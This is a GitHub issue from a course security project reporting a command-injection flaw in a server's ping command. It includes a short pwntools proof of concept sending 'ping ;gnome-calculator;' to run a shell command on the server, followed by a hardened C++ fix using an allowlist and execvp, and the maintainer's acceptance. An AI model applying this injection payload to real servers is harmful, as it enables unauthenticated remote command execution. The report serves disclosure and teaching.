si-co / grass

CS412 Term Project

Command injection in ping command #14

Closed matrizzo closed 5 years ago

matrizzo commented 5 years ago

There is a command injection vulnerability in the server's implementation of the ping command.

When the server is executing the ping command it concatenates the command ('ping') with the first argument given by the user and with '-c 1' (https://github.com/si-co/grass/blob/final/lib/commands.cpp#L110). The result is then passed to a shell using popen without further sanitization in _check_cmd (https://github.com/si-co/grass/blob/final/lib/utils.cpp#L61). This means that an unauthenticated attacker can execute arbitrary shell commands on the server by sending "ping ;;" (e.g. "ping ;gnome-calculator;").

I have created a proof-of-concept exploit (python/pwntools). The exploit takes the address and port at which the server is listening as the first two command line arguments and spawns a calculator on the machine where the server is running.

```python
from pwn import *
import sys

if len(sys.argv) < 3:
    print('Usage: {} <hostname> <port>'.format(sys.argv[0]))
    sys.exit(1)

SERVER_ADDR = sys.argv[1]
SERVER_PORT = int(sys.argv[2])

# Connect to the grass server and send the ping command with an injected
# argument; the server concatenates it into the shell string it hands to popen.
r = remote(SERVER_ADDR, SERVER_PORT)

r.sendline(b'ping ;gnome-calculator;')
```

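
The root cause described in this report is that user input is spliced into a shell command string and handed to `popen`. The following C++ block is an added example, not code from the grass project or from the reporter, showing the defensive pattern a fix would take: validate the ping target against a strict hostname allowlist (letters, digits, `.` and `-` only, so `;`, `|`, `&`, `$`, backticks and whitespace can never reach an interpreter), then run `ping` through `fork`/`execvp` with an argv array so no shell parses the argument at all. The function names (`build_ping_cmd_unsafe`, `is_valid_host`, `run_ping_safe`) are illustrative and do not correspond to anything in the project. `build_ping_cmd_unsafe` only returns the string the original concatenation would produce, for comparison; it is never executed.

```cpp
// Added example (not the grass project's code): hardened handling of the
// ping argument. Hypothetical function names; POSIX only (fork/execvp).
#include <cctype>
#include <cstdio>
#include <string>
#include <vector>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

// Mirrors the reported construction "ping " + arg + " -c 1" that the original
// passes to popen. Returned as a string only, to show what a shell would see.
std::string build_ping_cmd_unsafe(const std::string& user_arg) {
    return "ping " + user_arg + " -c 1";
}

// Allowlist check: hostname or dotted IPv4 literal. Only letters, digits,
// '.' and '-' are accepted; labels may not be empty or start/end with '-';
// overall and per-label lengths are bounded. Anything a shell could interpret
// (';', '|', '&', '$', '`', quotes, whitespace) is rejected by construction.
bool is_valid_host(const std::string& host) {
    if (host.empty() || host.size() > 253) return false;
    auto label_ok = [](const std::string& l) {
        return !l.empty() && l.size() <= 63 && l.front() != '-' && l.back() != '-';
    };
    std::string label;
    for (char c : host) {
        if (c == '.') {
            if (!label_ok(label)) return false;
            label.clear();
        } else if (std::isalnum(static_cast<unsigned char>(c)) || c == '-') {
            label += c;
        } else {
            return false;
        }
    }
    return label_ok(label);
}

// Runs "ping -c 1 <host>" without a shell. Returns the child's exit status,
// or -1 if the host fails validation or the child could not be started.
int run_ping_safe(const std::string& host) {
    if (!is_valid_host(host)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        // The argument is passed as its own argv element: no string is ever
        // re-parsed, and a leading '-' is already rejected by is_valid_host,
        // so the host cannot be mistaken for a ping option either.
        std::vector<std::string> args = {"ping", "-c", "1", host};
        std::vector<char*> argv;
        for (auto& a : args) argv.push_back(const_cast<char*>(a.c_str()));
        argv.push_back(nullptr);
        execvp(argv[0], argv.data());
        _exit(127);  // only reached if exec failed
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char** argv) {
    if (argc != 2) {
        std::fprintf(stderr, "usage: %s <host>\n", argv[0]);
        return 2;
    }
    std::printf("unsafe concatenation would give: %s\n",
                build_ping_cmd_unsafe(argv[1]).c_str());
    int rc = run_ping_safe(argv[1]);
    if (rc < 0) {
        std::fprintf(stderr, "rejected or failed to run: %s\n", argv[1]);
        return 1;
    }
    return rc;
}
```

Compiled with `g++ -std=c++11`, `./a.out 8.8.8.8` pings once, while `./a.out ';gnome-calculator;'` is rejected before any process is spawned. The allowlist is deliberately narrower than what `ping` itself accepts (no IPv6 literals, no `%` scope ids); widening it is a conscious decision that should be made with the same "no shell metacharacters" constraint in mind.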
si-co commented 5 years ago

Duplicate #9. Exploit verified and vulnerability accepted.